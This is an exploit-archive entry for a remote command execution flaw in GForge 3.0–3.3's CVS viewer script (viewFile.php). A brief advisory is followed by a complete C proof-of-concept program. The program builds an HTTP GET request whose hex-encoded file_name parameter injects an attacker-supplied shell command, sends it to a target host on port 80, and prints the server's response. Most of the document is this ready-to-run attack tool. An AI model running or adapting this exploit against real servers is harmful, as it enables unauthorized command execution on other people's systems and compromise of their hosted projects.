GForge 3.x remote command execution exploit that makes use of a flaw in the CVE modules.
3744f3a711daa6de0ebf219d09ae9702a6d0c963ed719af191c9abb3fb0d5ffa
Author: L|On
Homepage: http://www.bastardsoperatorsfromhell.org
Description: GForGE 3.x Remote Execute Command Exploit
GForge ( www.gforge.org) is a software to help collaborative development
for software communities. The software provides a full configured
development system with
tools for communication and version control among members of a
development team on a web site. GForge CVS modules have a remote execute
command
vulnerability exploited by malicious attackers.
Vulnerability Class: FileHandler.class
Version Effect: 3.0 - 3.3 - 4.x no tested
file with badcode:
viewFile.php,v 1.1.1.1 2004/08/09 21:12:16
viewFile.php,v 1.4 2003/10/25 22:46:13
Proof of Concept ExPlOiT by L|On lion@avatarcorp.org :
/***********************************************************
* GFORGE 3.0 - 3.3 POF EXPLOIT ver. 1.0 *
* Remote System Code Execution *
* by L|On 06 Apr 2005 *
* lion@avatarcorp.org - www.bastardsoperatorsfromhell.org *
* Thank's to all brother on #BOFH.IT *
***********************************************************/
#include <sys/types.h>
#include <netinet/in.h>
#include <string.h>
#include <netdb.h>
#include <ctype.h>
#include <arpa/nameser.h>
#include <strings.h>
#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>
#include <sys/socket.h>
#define MAX_SIZE 1
#define DEF_PATH "/scm/viewFile.php"
#define FALSE -1
#define TRUE 0
void usage_form(char *cmd){
fprintf(stderr,"\nGForGE 3.0 - 3.3 POF ExPlOiT by L|On 06 Apr
2005\n"
"lion@avatarcorp.org -
www.bastardsoperatorsfromhell.org\n"
"-------------------------------------------------\n"
"Usage: %s -t <target> [-l <link_path>] [-c
<cmd_send>] [-h]\n\n"
"target : victim_host\n"
"link_path : fukk path where locate bad php
file (default: /scm/viewFile.php)\n"
"cmd_send : command to send victim to test
bug\n\n", cmd);
exit(1);
}
int main(int argc, char *argv[])
{
int s, i = 0;
int testbug = FALSE;
struct sockaddr_in victem;
struct hostent *he;
char opt;
char location[50] = DEF_PATH;
char *evilcode;
char *target = NULL;
char *buffer;
char cgibuff[40000];
char *temp[MAX_SIZE + 2];
char *name[MAX_SIZE + 2];
char *get_html = "GET ";
char *host_html = "Host: ";
char *vcode={"\x3f\x67\x72\x6f\x75\x70\x5f\x69\x64\x3d\x35\x26"
"\x66\x69\x6c\x65\x5f\x6e\x61\x6d\x65\x3d\x25\x30"
"\x41"};
while((opt = getopt(argc, argv, "t:l:c:h")) != EOF){
switch(opt)
{
case 't':
target = optarg;
break;
case 'l':
location[0] = '\0';
strcat(location, optarg);
break;
case 'c':
testbug = TRUE;
evilcode = optarg;
break;
case 'h':
usage_form(argv[0]);
break;
}
}
if(target == NULL){
fprintf(stderr,"No target specified, try -h for help\n");
exit(1);
}
temp[1] = malloc(1000);
strcat(temp[1], vcode);
strcat(temp[1], evilcode);
strcat(temp[1], "%0a HTTP/1.0\n");
if ((he=gethostbyname(target)) == NULL) exit(printf("Error getting
hostname"));
name[1] = "Send Evil Code...";
while(i++ < MAX_SIZE){
if((buffer = (char *) malloc (strlen(get_html) +
strlen(location) + strlen(temp[1]) + strlen(host_html) + strlen(target)
+ 1)) == NULL){
perror("(malloc buffer)");
exit(2);
}
strcat(buffer, get_html);
strcat(buffer, location);
strcat(buffer, temp[1]);
strcat(buffer, host_html);
strcat(buffer, target);
strcat(buffer, "\n");
if (testbug == TRUE) strcat(buffer, "\n");
printf("\n%s** %d\n\n", buffer, strlen(buffer));
s=socket(AF_INET, SOCK_STREAM, 0);
bcopy(he->h_addr, (char *)&victem.sin_addr, he->h_length);
victem.sin_family=AF_INET;
victem.sin_port=htons(80);
if (connect(s, (struct sockaddr*)&victem, sizeof(victem))<0)
exit(printf("Connect error"));
cgibuff[0] = '\0';
fprintf(stderr,"%s...",name[1]);
send(s, buffer, strlen(buffer),0);
if (testbug == TRUE){
recv(s, cgibuff, sizeof(cgibuff),MSG_WAITALL); // MSG_WAITALL for
recive entire text
if(strlen(cgibuff) != 0) fprintf(stderr,"\n%s\n", cgibuff);
close(s);
exit(0);
}
printf("DONE\n");
close(s);
buffer[0] = '\0';
}
return 0;
}